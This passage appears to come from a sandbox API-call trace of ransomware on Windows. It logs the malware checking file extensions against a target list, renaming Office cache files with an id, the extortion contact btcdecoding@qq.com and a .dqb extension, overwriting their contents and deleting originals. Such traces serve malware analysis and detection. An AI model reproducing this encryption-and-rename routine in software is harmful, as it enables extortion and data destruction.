(lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0041.062] lstrlenW (lpString=".zip") returned 4 [0041.062] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.062] lstrlenW (lpString=".rar") returned 4 [0041.062] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.062] lstrlenW (lpString=".bz2") returned 4 [0041.062] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.062] lstrlenW (lpString=".7z") returned 3 [0041.062] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.062] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0041.062] lstrlenW (lpString=".dbf") returned 4 [0041.062] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.062] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0041.062] lstrlenW (lpString=".1cd") returned 4 [0041.062] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.062] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0041.062] lstrlenW (lpString=".jpg") returned 4 [0041.062] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.063] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0041.063] lstrlenW (lpString="Office32MUI.msi") returned 15 [0041.063] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0041.063] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=873984) returned 1 [0041.063] CloseHandle (hObject=0x1f4) returned 1 [0041.063] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi")) returned 0x2020 [0041.063] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0041.063] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0041.063] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.063] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.063] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0041.069] GetLastError () returned 0x0 [0041.069] ReadFile (in: hFile=0x1f4, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0xd5600, lpOverlapped=0x0) returned 1 [0041.085] WriteFile (in: hFile=0x178, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xd5610, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xd5610, lpOverlapped=0x0) returned 1 [0041.106] ReadFile (in: hFile=0x1f4, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0041.106] WriteFile (in: hFile=0x178, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xf2, lpOverlapped=0x0) returned 1 [0041.107] SetEndOfFile (hFile=0x178) returned 1 [0041.107] CloseHandle (hObject=0x178) returned 1 [0041.113] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.435] SetEndOfFile (hFile=0x1f4) returned 1 [0041.442] CloseHandle (hObject=0x1f4) returned 1 [0041.442] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0041.443] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi")) returned 1 [0041.443] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.443] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.443] lstrlenW (lpString=".doc") returned 4 [0041.443] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.443] lstrlenW (lpString=".docx") returned 5 [0041.443] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0041.443] lstrlenW (lpString=".pdf") returned 4 [0041.443] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.443] lstrlenW (lpString=".xls") returned 4 [0041.443] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.443] lstrlenW (lpString=".xlsx") returned 5 [0041.443] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0041.443] lstrlenW (lpString=".ppt") returned 4 [0041.443] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.443] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.443] lstrlenW (lpString=".zip") returned 4 [0041.443] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.443] lstrlenW (lpString=".rar") returned 4 [0041.443] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.443] lstrlenW (lpString=".bz2") returned 4 [0041.443] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.443] lstrlenW (lpString=".7z") returned 3 [0041.443] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.443] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.443] lstrlenW (lpString=".dbf") returned 4 [0041.443] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.443] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.443] lstrlenW (lpString=".1cd") returned 4 [0041.444] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.444] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.444] lstrlenW (lpString=".jpg") returned 4 [0041.444] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.444] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.444] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.444] lstrlenW (lpString=".doc") returned 4 [0041.444] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.444] lstrlenW (lpString=".docx") returned 5 [0041.444] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0041.444] lstrlenW (lpString=".pdf") returned 4 [0041.444] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.444] lstrlenW (lpString=".xls") returned 4 [0041.444] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.444] lstrlenW (lpString=".xlsx") returned 5 [0041.444] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0041.444] lstrlenW (lpString=".ppt") returned 4 [0041.444] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.444] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.444] lstrlenW (lpString=".zip") returned 4 [0041.444] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.444] lstrlenW (lpString=".rar") returned 4 [0041.444] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.444] lstrlenW (lpString=".bz2") returned 4 [0041.444] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.444] lstrlenW (lpString=".7z") returned 3 [0041.444] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.444] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.444] lstrlenW (lpString=".dbf") returned 4 [0041.444] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.444] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.444] lstrlenW (lpString=".1cd") returned 4 [0041.444] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.444] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.444] lstrlenW (lpString=".jpg") returned 4 [0041.444] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.445] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0041.445] lstrlenW (lpString="InfLR.cab") returned 9 [0041.445] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0041.445] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=18874884) returned 1 [0041.445] CloseHandle (hObject=0x1f4) returned 1 [0041.445] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab")) returned 0x2020 [0041.445] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0041.445] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0041.446] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0041.446] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0x0) returned 1 [0041.446] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0041.446] ReadFile (in: hFile=0x1f4, lpBuffer=0x3970058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x3970058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.452] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x6000ac, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0041.452] ReadFile (in: hFile=0x1f4, lpBuffer=0x39b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39b0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.459] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0041.459] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x11c0204, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0041.459] ReadFile (in: hFile=0x1f4, lpBuffer=0x39f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39f0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.521] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.521] WriteFile (in: hFile=0x1f4, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x2dbfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0041.637] SetEndOfFile (hFile=0x1f4) returned 1 [0041.637] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x400a4f0 [0041.641] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0041.641] WriteFile (in: hFile=0x1f4, lpBuffer=0x400a4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x400a4f0*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.642] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x6000ac, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0041.642] WriteFile (in: hFile=0x1f4, lpBuffer=0x400a4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x400a4f0*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.645] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x11c0204, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0041.645] WriteFile (in: hFile=0x1f4, lpBuffer=0x400a4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x400a4f0*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.648] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x400a4f0 | out: hHeap=0x570000) returned 1 [0041.648] CloseHandle (hObject=0x1f4) returned 1 [0042.317] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0042.325] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.325] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.325] lstrlenW (lpString=".doc") returned 4 [0042.325] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.325] lstrlenW (lpString=".docx") returned 5 [0042.327] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.329] lstrlenW (lpString=".pdf") returned 4 [0042.331] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.331] lstrlenW (lpString=".xls") returned 4 [0042.331] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.331] lstrlenW (lpString=".xlsx") returned 5 [0042.333] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.335] lstrlenW (lpString=".ppt") returned 4 [0042.335] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.335] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.337] lstrlenW (lpString=".zip") returned 4 [0042.338] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.338] lstrlenW (lpString=".rar") returned 4 [0042.340] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.340] lstrlenW (lpString=".bz2") returned 4 [0042.340] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.341] lstrlenW (lpString=".7z") returned 3 [0042.341] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.341] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.342] lstrlenW (lpString=".dbf") returned 4 [0042.344] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.344] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.344] lstrlenW (lpString=".1cd") returned 4 [0042.344] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.346] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.347] lstrlenW (lpString=".jpg") returned 4 [0042.353] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.353] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.353] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.355] lstrlenW (lpString=".doc") returned 4 [0042.361] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.361] lstrlenW (lpString=".docx") returned 5 [0042.361] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.361] lstrlenW (lpString=".pdf") returned 4 [0042.361] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.361] lstrlenW (lpString=".xls") returned 4 [0042.361] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.361] lstrlenW (lpString=".xlsx") returned 5 [0042.361] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.361] lstrlenW (lpString=".ppt") returned 4 [0042.361] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.361] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.361] lstrlenW (lpString=".zip") returned 4 [0042.361] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.361] lstrlenW (lpString=".rar") returned 4 [0042.361] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.361] lstrlenW (lpString=".bz2") returned 4 [0042.361] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.361] lstrlenW (lpString=".7z") returned 3 [0042.361] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.361] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.361] lstrlenW (lpString=".dbf") returned 4 [0042.361] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.361] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.361] lstrlenW (lpString=".1cd") returned 4 [0042.361] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.362] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.362] lstrlenW (lpString=".jpg") returned 4 [0042.362] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.362] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0042.362] lstrlenW (lpString="OnoteLR.cab") returned 11 [0042.362] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0042.362] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=17456632) returned 1 [0042.362] CloseHandle (hObject=0x1a4) returned 1 [0042.362] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab")) returned 0x2020 [0042.362] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.362] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0042.363] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0042.363] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0x0) returned 1 [0042.363] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0042.363] ReadFile (in: hFile=0x1a4, lpBuffer=0x3970058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x3970058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.394] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x58c9fd, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0042.394] ReadFile (in: hFile=0x1a4, lpBuffer=0x39b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39b0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.410] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2dbfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0042.410] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x1065df8, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc2c | out: lpNewFilePointer=0x0) returned 1 [0042.410] ReadFile (in: hFile=0x1a4, lpBuffer=0x39f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2dbfc38, lpOverlapped=0x0 | out: lpBuffer=0x39f0058*, lpNumberOfBytesRead=0x2dbfc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.429] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0042.429] WriteFile (in: hFile=0x1a4, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2dbfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0042.649] SetEndOfFile (hFile=0x1a4) returned 1 [0042.649] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3ef2068 [0042.653] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0042.653] WriteFile (in: hFile=0x1a4, lpBuffer=0x3ef2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef2068*, lpNumberOfBytesWritten=0x2dbfc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.653] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x58c9fd, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfc7c | out: lpNewFilePointer=0x0) returned 1 [0042.654] WriteFile (in: hFile=0x1a4, lpBuffer=0x3ef2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2dbfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef2068*, 